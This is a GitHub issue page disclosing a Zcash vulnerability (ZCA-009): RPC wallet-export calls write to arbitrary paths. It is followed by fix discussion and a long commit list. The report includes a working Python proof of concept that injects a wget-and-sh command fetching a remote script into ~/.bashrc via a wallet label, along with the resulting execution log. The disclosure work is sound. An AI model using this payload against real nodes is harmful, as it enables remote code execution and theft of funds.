Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

ZCA-009 Improper destination path validation in RPC calls allows arbitrary command execution #1497

Closed
coinspect opened this issue Oct 7, 2016 · 2 comments

Comments

@ghost
Copy link

@ghost ghost commented Oct 7, 2016

Authenticated RPC users can use the z_exportwallet, dumpwallet, and backupwallet methods to create or overwrite existing files in any location of the system accessible by the zcashd daemon. An attacker may be able to overwrite or create critical files, such as configuration files or scripts.
For example, the following files in Linux systems: ~/.bashrc, ~/.ssh/authorized_keys, ~/.zcash/zcash.conf.

Although the attacker does not completely control the data written, the method importprivkey can be used to set the label of transparent addresses to any text string. Setting a label is enough to achieve arbitrary command execution as demonstrated by the PoC script below

#!/usr/bin/python
# Copy to zcash/qa/rpc-tests
from test_framework.authproxy import AuthServiceProxy, JSONRPCException
#label="\nblocknotify={wget,--no-check-certificate,https://paste.ee/r/u7b5s};{sh,u7b5s}"
label = ';{wget,--no-check-certificate,https://paste.ee/r/u7b5s};{sh,u7b5s}'
api = AuthServiceProxy('http://username:password@127.0.0.1:18232')
api.importprivkey('cPE4h5Au9xmrgc8fCQuZYC2JqqZmmy4UovTbfAy1xKQhk83kFThW',label)
api.z_exportwallet('/home/admin/.bashrc')

A shell script file is downloaded and executed the next time the node's administrator logs into the system:

$ ssh admin@zcashnode
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.18.26-guest-4-4751b4a-x86_64 x86_64)

Last login: Fri Oct  07 15:49:35 2016 from 130.347.450.56
-bash: cPE4h5Au9xmrgc8fCQuZYC2JqqZmmy4UovTbfAy1xKQhk83kFThW: command not found
--2016-10-07 15:50:31--  https://paste.ee/r/7DVvf
Resolving paste.ee (paste.ee)... 2400:cb00:2048:1::6812:3114, 2400:cb00:2048:1::6812:3014, 104.18.48.20, ...
Connecting to paste.ee (paste.ee)|2400:cb00:2048:1::6812:3114|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: '7DVvf'
 [ <=>     ] 47 --.-K/s   in 0s
2016-10-07 15:50:31 (5.19 MB/s) - '7DVvf' saved [47]

All your coinz are belong to uz
-bash: cPPiJvCfkiYk71igZwm8TXVFe5r5ZW7E2e5spXnCEX9kvLMrBZsr: command not found
-bash: cQ6ZvfJoSNE8TXAy2LgoVok8f36gGdrAjfiVdu3sBxFTosPcBhE3: command not found
-bash: cPW4FfcTm9hYCmvrfEnspbzg5MqzbYKgsM9Yrm29v42cUWYN1L5z: command not found
-bash: cUww2V8RKDAiFi6YcEzLWb57wBb4SoT7HU2D226fwkmkLbQTRR6A: command not found
-bash: cQDRXgmuqHig7qppZf5j8Wid3zNp3V8BWF41o1ByMVE64NUha1Vh: command not found

( ... )
admin@zcash:~$ 

Alternative, attackers can try to overwrite~/.zcash/zcash.conf including a blocknotify=command line and execute commands every time the best block changes instead of waiting for the administrator to log in. New line characters are escaped in the file created by z_exportwallet but a workaround could be found.

Adversaries with RPC access can empty the wallet, but executing commands allows them to maintain access to the system and wait for the wallet balance to increase before emptying it. Executing commands also allow attackers to persist on the system to collect information to de-anonymize future transactions.

The risk is higher if zcashd’s RPC interface is used in web and mobile wallets back-ends to create transactions.
Bitcoin wallets back-ends often use bitcoind’s RPC with wallet functionality disabled to query public blockchain information; but we can expect the first Zcash web and mobile wallets to use zcashd’s RPC with wallet functions enabled to make transactions if alternative implementations of Zcash are not available.

@bitcartel

This comment has been minimized.

Copy link
Contributor

@bitcartel bitcartel commented Oct 7, 2016

@nathan-at-least nathan-at-least added this to the 1.0.1 stabilization milestone Oct 10, 2016
@daira daira referenced this issue Oct 25, 2016
@bitcartel

This comment has been minimized.

Copy link
Contributor

@bitcartel bitcartel commented Dec 19, 2016

We could have a zcash.conf config option e.g. exportfolder where any RPC calls which accept a filename to write data to, will only write that data to the folder. If the option is not set, the default is to return an error message to the user.

bitcartel added a commit to bitcartel/zcash that referenced this issue Jan 10, 2017
…d folder.

Previously the RPC interface allowed z_exportwallet, backupwallet and
dumpwallet to write data to an arbitrary filename.  ZCA-009 demonstrates
how this is vulnerable.  The resolution is to only allow data to
written when the -exportdir has been configured.  Also filenames are
restricted to alphanumeric characters.
bitcartel added a commit to bitcartel/zcash that referenced this issue Jan 10, 2017
…d folder.

Previously the RPC interface allowed z_exportwallet, backupwallet and
dumpwallet to write data to an arbitrary filename.  ZCA-009 demonstrates
how this is vulnerable.  The resolution is to only allow data to
written when the -exportdir has been configured.  Also filenames are
restricted to alphanumeric characters.
@bitcartel bitcartel added the has PR label Jan 10, 2017
bitcartel added a commit to bitcartel/zcash that referenced this issue Jan 10, 2017
…d folder.

Previously the RPC interface allowed z_exportwallet, backupwallet and
dumpwallet to write data to an arbitrary filename.  ZCA-009 demonstrates
how this is vulnerable.  The resolution is to only allow data to
written when the -exportdir has been configured.  Also filenames are
restricted to alphanumeric characters.
zkbot added a commit that referenced this issue Jan 18, 2017
…_exporting, r=ebfull

Fixes #1497 ZCA-009 by restricting export to a user defined folder and sanitizing filenames
zkbot added a commit that referenced this issue Jan 18, 2017
…_exporting, r=bitcartel

Fixes #1497 ZCA-009 by restricting export to a user defined folder and sanitizing filenames
zkbot added a commit that referenced this issue Jan 18, 2017
…_exporting, r=bitcartel

Fixes #1497 ZCA-009 by restricting export to a user defined folder and sanitizing filenames
@zkbot zkbot closed this in 9064d73 Jan 18, 2017
joshuayabut added a commit to z-classic/zclassic that referenced this issue Jan 31, 2017
* Add getlocalsolps and getnetworksolps RPC calls, show them in getmininginfo

* Add benchmark for attempting decryption of notes

* Add benchmark for incrementing note witnesses

* Add -metricsui flag to toggle between persistent screen and rolling metrics

Defaults to true if stdout is a TTY, else false.

* Add -metricsrefreshtime option

* Only show metrics by default if stdout is a TTY

* Document metrics screen options

* Fix stale comment referencing upstream block interval

* Add checkpoint at block height 15000

* Make command line option to show all debugging consistent with similar options

Most people expect a value of 1 to enable all for command line arguments.
However to do this for the -debug option you must type "-debug=".
This has been changed to allow "-debug=1" as well as "-debug=" to
enable all debug logging

* Update documentation to match the #4219 change

* Update help message to match the #4219 change

* Clarify that metrics options are only useful without -daemon and -printtoconsole

* Increase length of metrics divider

* Closes zcash#1857. Fixes bug where tx spending only notes had priority of 0.

* Closes zcash#1901. Increase default settings for the max block size when
mining and the amount of space available for priority transactions.

* Write witness caches when writing the best block

For steady-state operation, this reduces the average time between wallet disk
writes from once per block to once per hour.

On -rescan, witness caches are only written out at the end along with the best
block, increasing speed while ensuring that on-disk state is kept consistent.

Witness caches are now never recreated during a -reindex, on the assumption that
the blocks themselves are not changing (the chain is just being reconstructed),
and so the witnesses will remain valid.

Part of zcash#1749.

* Add porter dev overrides for CC, CXX, MAKE, BUILD, HOST

* Apply miniupnpc patches to enable compilation on Solaris 11

These can be removed after the next MiniUPnP release.

Closes zcash#1835.

* Closes zcash#1903. Add fee parameter to z_sendmany.

* Add an upstream miniupnpc patch revision

* Metrics - Don't exclaim unless > 1

"You have validated 0 transactions!" sounds a little less enthusiastic that intended. Also, only says "1 transaction".

* Address review comments, tweak strings

* bash-completion: Adapt for 0.12 and 0.13

 * separate completion for bitcoind and bitcoin-cli
 * remove RPC support from bitcoind completion
 * add completion for bitcoin-tx and bitcoin-qt
 * rely on autoloading of completions

* Change function names to not clash with Bitcoin, apply to correct binaries

* Add bash completion files to Debian package

* Always bash-complete the default account

* Add Zcash RPC commands to CLI argument completion

* Fixes zcash#1823. Witness anchors for input notes no longer cross block boundaries.

* Edit for grammar: "block chain"

At this point, I believe it is universally accepted that "blockchain" is one word, and should not be separated into two.

* Increase timeout as laptops on battery power have cpu throttling.

* Isolate verification to a `ProofVerifier` context object that allows verification behavior to be tuned by the caller.

* Regression test.

* Ensure cache contains valid entry when anchor is popped.

* Ensure ProofVerifier cannot be accidentally copied.

* Document behaviour of CWallet::SetBestChain

* WitnessAnchorData only needs to store one witness per JSOutPoint.

* Rename Dummy to Disabled.

* Add more tests for ProofVerifier.

* Fix indentation

* Generate JS for trydecryptnotes, make number of addresses a variable

* Add JS to second block to ensure witnesses are incremented

* ASSERT_TRUE -> ASSERT_FALSE

* Skip JoinSplit verification before the last checkpoint

Part of zcash#1749

* Gather release notes from previous release to HEAD

Also update release-process.md to replace git shortlog command with
release-notes.py script.

* Add a reindex test that fails because of a bug in decrementing witness caches

Ref: zcash#1904 (comment)

* Make the test pass by fixing the bug!

* Only check cache validity for witnesses being incremented or decremented

Fixes the bug resulting from zcash#1904.

* Update release process to check in with users who opened resolved issues

* Check that E' points are actually in G2 by ensuring they are of order r.

* Fix bug in wallet tests

* Extract block-generation wallet test code into a function

* Rewrite reindex test to check beyond the max witness cache size

* Fix bug in IncrementNoteWitness()

* Extend createjoinsplit to benchmark parallel JoinSplits

Closes zcash#1940

* Update payment API docs to recommend -rescan for fixing witness errors

* Add total number of commitments to getblockchaininfo

* Update version to 1.0.4

* Update man pages

* Release notes, authors, changelog

* Only enable getblocktemplate when wallet is enabled

* Only run wallet tests when wallet is enabled

* Add a tool for profiling the creation of JoinSplits

* Add test for IncrementalMerkleTree::size().

* Exclude test binaries from make install

Closes zcash#1943.

* Fixes zcash#1964 to catch general exception in z_sendmany and catch
exceptions as reference-to-const.

* Fixes zcash#1967 by adding age of note to z_sendmany logging.

* Scan the whole chain whenever a z-key is imported

Closes zcash#1941.

* Instruct users to run zcash-fetch-params if network params aren't available

Closes zcash#1786.

* Fixes a bug where the unsigned transaction was logged by z_sendmany
after a successful sign and send, meaning that the logged hash fragment
would be different from the txid logged by "AddToWallet".  This issue
occured when sending from transparent addresses, as utxo inputs must be
signed.  It did not occur when sending from shielded addresses.

* Trigger metrics UI refresh on new messages

* Strip out the SECURE flag in metrics UI so message style is detected

* Add 'CreateJoinSplit' standalone utility to gitignore.

* Handle newlines in UI messages

* Suggest ./zcutil/fetch-params.sh as well

Once we improve the from-source installation docs to use 'make install', we can
revert this commit.

* Update debug categories

Closes zcash#1954.

* CreateJoinSplit: add start_profiling() call

This solves the problem of profiling output displaying nonsensical large time values.

* rpc: Implement random-cookie based authentication

When no `-rpcpassword` is specified, use a special 'cookie' file for
authentication. This file is generated with random content when the
daemon starts, and deleted when it exits. Read access to this file
controls who can access through RPC. By default this file is stored in
the data directory but it be overriden with `-rpccookiefile`.

This is similar to Tor CookieAuthentication: see
https://www.torproject.org/docs/tor-manual.html.en

Alternative to #6258. Like that pull, this allows running bitcoind
without any manual configuration. However, daemons should ideally never write to
their configuration files, so I prefer this solution.

* Rename build-aux/m4/bitcoin_find_bdb48.m4 to remove version

Closes zcash#1622.

* Bump COPYRIGHT_YEAR from 2016 to 2017.

* Throw an error if zcash.conf is missing

An empty zcash.conf is sufficient to bypass this error.

* Show a friendly message explaining why zcashd needs a zcash.conf

* Closes zcash#1780. Result of z_getoperationstatus now sorted by creation time of operation

* Create ISSUE_TEMPLATE.md

* move template to subdirectory, fix typo, include prompt under describing issue section, include uploading file directly to github ticket as option for sharing logs

* Remove UTF-8 BOM efbbbf from zcash.conf to avoid problems with command line tools

* Closes zcash#1097 so zcash-cli now displays license info like zcashd.

LicenseInfo is refactored from init.cpp to util.cpp so that the
bitcoin-cli makefile target does not need to be modified.

* Fixes zcash#1497 ZCA-009 by restricting data exporting to user defined folder.

Previously the RPC interface allowed z_exportwallet, backupwallet and
dumpwallet to write data to an arbitrary filename.  ZCA-009 demonstrates
how this is vulnerable.  The resolution is to only allow data to
written when the -exportdir has been configured.  Also filenames are
restricted to alphanumeric characters.

* Closes zcash#1957 by adding tx serialization size to listtransactions output.

* Fix gtest ordering broken by zcash#1949

Part of zcash#1539

* Fixes zcash#1960: z_getoperationstatus/result now includes operation details.

* Debian package lint

- Tweak description synopsis to make Debian happy
- Put bash completion files in correct directory
- Add a manpage for zcash-fetch-params

* Generate Debian control file to fix shlibs lint

* Create empty zcash.conf during performance measurements

* Create empty zcash.conf during coverage checks

Fixes regression caused by zcash#2013.

* Coverage build system tweaks

* Update walletbackup.py qa test to use -exportdir option

* Add missing header required by std::accumulate

* Increase timeout for z_sendmany transaction in wallet.py qa test

* Add test for z_importkey rescanning from beginning of chain.

* Bump version to 1.0.5.

* Update release notes and Debian package.

* V1.0.4 mac (#51)

* initial mac version of zclassic

Work in progress - 15JAN2017

more refactoring

linux refactoring fixes

osx refactoring fixes

initial win64 commit

fixup! initial win64 commit

compile libsnark with posix threads

build gtest and gmock with posix

Working build

fixup! Working build

* Windows and Linux builds ok

* fixup! Merge tag 'v1.0.5' into v1.0.5-multios

* fixup! fixup! Merge tag 'v1.0.5' into v1.0.5-multios

* fixup! fixup! fixup! Merge tag 'v1.0.5' into v1.0.5-multios

* Fix OSX compatibility with depends

* OSX Compat - Fix site_t ambiguity in json

* fixup! OSX Compat - Fix site_t ambiguity in json
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.